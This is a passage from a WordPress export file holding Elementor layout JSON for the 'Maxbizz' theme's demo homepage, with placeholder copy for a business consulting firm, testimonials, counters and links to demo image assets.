0.12)"},"link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/business-consulting\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false}],"isInner":false},{"id":"511be14","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"60","right":"0","bottom":"115","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"30","right":"0","bottom":"115","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"6aae6b1","elType":"column","settings":{"_column_size":50,"_inline_size":58.3299999999999982946974341757595539093017578125,"_inline_size_tablet":100},"elements":[{"id":"9fcb57c","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-home1.png","id":1087},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-56","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"11b4045","elType":"column","settings":{"_column_size":50,"_inline_size":41.6700000000000017053025658242404460906982421875,"_inline_size_tablet":100},"elements":[{"id":"ae12833","elType":"widget","settings":{"sub":"about company","title":"Make Digital Marketing<br>  Work For Your Business","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"743ac70","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.<\/p><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0208e7b","elType":"widget","settings":{"text":"Explore More ","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/about-us\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"040fdd3","elType":"section","settings":{"background_background":"classic","background_color":"#F5F5F5","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"e16b91c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"dbb71e7","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01-1.svg","id":583},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02-1.svg","id":584},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03-1.svg","id":585},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04-1.svg","id":586},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05-1.svg","id":587},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06-1.svg","id":588},"image_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom","img_css_filters_hover_brightness":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false},{"id":"7d99a45","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"77","right":"0","bottom":"77","left":"0","isLinked":false},"content_position":"middle","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-home1.jpg","id":1106}},"elements":[{"id":"c9a36b2","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"70","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"0d17557","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"79105d7","elType":"widget","settings":{"ot_accs":[{"acc_title":"Exceptional Client Service","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"74a73c1"},{"acc_title":"A Great Team and Winning Culture","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"a8df8eb"},{"acc_title":"A Commitment to Integrity, Fairness","acc_content":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new energy and support.<\/p>","_id":"dc09f20"}],"bg_title":"#A7A7A733","title_color":"#FFFFFF","bg_content":"#9C3D3D00","title_border":"#FFFFFF33","content_color":"#CCCCCC","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"9a05bdd","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"82b3aac","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-home1.jpg","id":1026},"image_size":"full","align_tablet":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"8b58779","elType":"section","settings":{"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"de9d564","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"dc29e36","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"d0b6bb7","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"4912bc8","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"0ccb8d2","elType":"widget","settings":{"sub":"our industries","title":"Industries What We Serv","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"86cc958","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"a3162c5","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"d1461de","elType":"widget","settings":{"icon_boxes":[{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":1407},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"849a65e"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance-1.svg","id":1408},"library":"svg"},"title":"Government Services","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"c3a0772"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/card.svg","id":1409},"library":"svg"},"title":"Consumer Products","des":"Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"46fcac0"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":1410},"library":"svg"},"title":"Airlines & Transport","des":"Few industries are as demanding as transportation services. That's why it is critical to implement high-impact.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"d9d0d0b"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/energy.svg","id":980},"library":"svg"},"title":"Natural Resources","des":"We provide deep experience across the oil & gas and utilities & renewables sectors to deliver operational.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"65843bf"},{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/notebook.svg","id":1411},"library":"svg"},"title":"Private Equity","des":"Firm is the leading consulting partner to the private equity industry and its key stakeholders. We advise investors.","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"_id":"b1c56c1"}],"box_padding":{"unit":"px","top":"50","right":"50","bottom":"48","left":"40","isLinked":false}},"elements":[],"widgetType":"iiconbox_grid"}],"isInner":false}],"isInner":false},{"id":"2d8e54b","elType":"section","settings":{"layout":"full_width","overflow":"hidden","stretch_section":"section-stretched"},"elements":[{"id":"84b6137","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"543937f","elType":"widget","settings":{"fservice_lists":[{"fservice_number":"01","fservice_title":"Client Learning<br>  Programs","fservice_content":"Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"_id":"d965848","btn_text":"Read More","fservice_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/fservice1.jpg","id":1114}},{"fservice_number":"02","fservice_title":"Partnership <br>  Ecosystem","fservice_content":"Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"Read More","fservice_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/fservice2.jpg","id":1115},"_id":"eca4d11"},{"fservice_number":"03","fservice_title":"New Business  <br>  Innovation","fservice_content":"Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"Read More","fservice_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/fservice-3.jpg","id":1244},"_id":"84956ce"},{"fservice_number":"04","fservice_title":"Digital Delivery <br>  Platform","fservice_content":"Accelerate your innovation and transformation with a fully integrated suite of capabilities that puts digital at the heart of everything you do.","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""},"btn_text":"Read More","fservice_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/fservice4.jpg","id":1117},"_id":"38c2388"}],"btn_text":"Read More","fservice_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"ifearuresservice"}],"isInner":false}],"isInner":false},{"id":"ec2214d","elType":"section","settings":{"gap":"extended","structure":"20","content_position":"middle","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg-overlay-home1.png","id":1159},"background_position":"initial","background_ypos":{"unit":"%","size":28,"sizes":[]},"background_repeat":"no-repeat","background_size_tablet":"initial","background_bg_width_tablet":{"unit":"px","size":0,"sizes":[]},"background_overlay_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg-overlay-home1.png","id":1159},"background_overlay_position":"center left","background_overlay_repeat":"no-repeat","background_overlay_opacity":{"unit":"px","size":1,"sizes":[]},"padding":{"unit":"px","top":"76","right":"0","bottom":"0","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"84966bf","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"38b1baf","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image3-home1.png","id":1158},"image_size":"full","_margin":{"unit":"px","top":"0","right":"-20","bottom":"0","left":"-260","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"604a7e1","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"70","isLinked":false},"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"2caa499","elType":"widget","settings":{"sub":"our benefits","title":"The Best Way To Start Your  Business Right Now","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"c94b7d0","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/badge-1.svg","id":1415},"library":"svg"},"title":"Passion for Results","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","bg_hover_icon_color":"#FFFFFF","bg_hover_icon_bg":"#FF8F3E","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"title_space_top":{"unit":"px","size":0,"sizes":[]},"des_color":"#60626D","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"link":{"url":"","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox2"},{"id":"d410c39","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":1413},"library":"svg"},"title":"Quality Services","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","bg_hover_icon_color":"#FFFFFF","bg_hover_icon_bg":"#FF8F3E","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"title_space_top":{"unit":"px","size":0,"sizes":[]},"des_color":"#60626D","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"link":{"url":"","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox2"},{"id":"a5b9838","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":1414},"library":"svg"},"title":"Diversity & Inclusion","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","bg_hover_icon_color":"#FFFFFF","bg_hover_icon_bg":"#FF8F3E","icon_space":{"unit":"px","size":100,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"title_space_top":{"unit":"px","size":0,"sizes":[]},"des_color":"#60626D","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"iiconbox2"}],"isInner":false}],"isInner":false},{"id":"8b33593","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-home1.jpg","id":1182},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"82","right":"0","bottom":"80","left":"0","isLinked":false},"content_position":"middle","background_position_tablet":"center left"},"elements":[{"id":"7fa70cf","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"d9a0685","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"2276f10","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"3286979","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"1d5c721","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false},"btn_style":"light"},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"abe6319","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-about-us.jpg","id":520},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"115","right":"0","bottom":"175","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"6449097","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"ae846ec","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"9c0c8ea","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"174b564","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"c22c849","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"bb7408d","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"b651ab9","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"0e26840","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/themes\/maxbizz\/images\/avatar-1.png"},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"bb01329","elType":"section","settings":{"gap":"extended","padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"3f37e40","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4f2e7dd","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"b6800aa","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"a4dd117","elType":"widget","settings":{"sub":"portfolio","title":"Our Latest Case Studies","header_size":"h3","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"ae923e8","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"5c73d49","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"view all","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/portfolio-grid\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":true}],"isInner":true},{"id":"1fa0cb3","elType":"widget","settings":{"filter":"","all_text":"All","column":"pf_4_cols","project_num":4,"load_more":"","loading_more":"Loading...","style":"p-metro","overlay_align":"left","position":"flex-end","overlay_background":"#26283299","show_icon":"","title_spacing":{"unit":"px","size":8,"sizes":[]},"cat_hcolor":"#FF8523"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false},{"id":"0d2ea48","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"75","right":"0","bottom":"75","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false},"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg3-home1.jpg","id":1233},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover"},"elements":[{"id":"34d931a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"6489fcb","elType":"widget","settings":{"title":"Trusted <br>Clients","number":"350","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_color":"#FFFFFF","title_color":"#FFFFFF"},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7545924","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"4050d4a","elType":"widget","settings":{"title":"Finished <br>Projects","number":"215","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_color":"#FFFFFF","title_color":"#FFFFFF"},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"d31b1fc","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"18c9b8a","elType":"widget","settings":{"title":"Years of <br>Experience","number":"15","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_color":"#FFFFFF","title_color":"#FFFFFF"},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"89fa2e6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"4b1f91b","elType":"widget","settings":{"title":"Visited<br>Conferences","number":"36","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_color":"#FFFFFF","title_color":"#FFFFFF"},"elements":[],"widgetType":"icounter"}],"isInner":false}],"isInner":false},{"id":"e31b0e9","elType":"section","settings":{"padding":{"unit":"px","top":"115","right":"0","bottom":"120","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"040f40f","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"58189e4","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3c2b883","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"69596a1","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"101c6e8","elType":"widget","settings":{"sub":"our blog","title":"Read Our Latest Insights","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"60d1d03","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"f4fa830","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"b682204","elType":"widget","settings":{"post_num":3,"dots":"false","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"ipostcarousel"},{"id":"bf1dadf","elType":"widget","settings":{"align":"center","text":"view all","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/blog\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
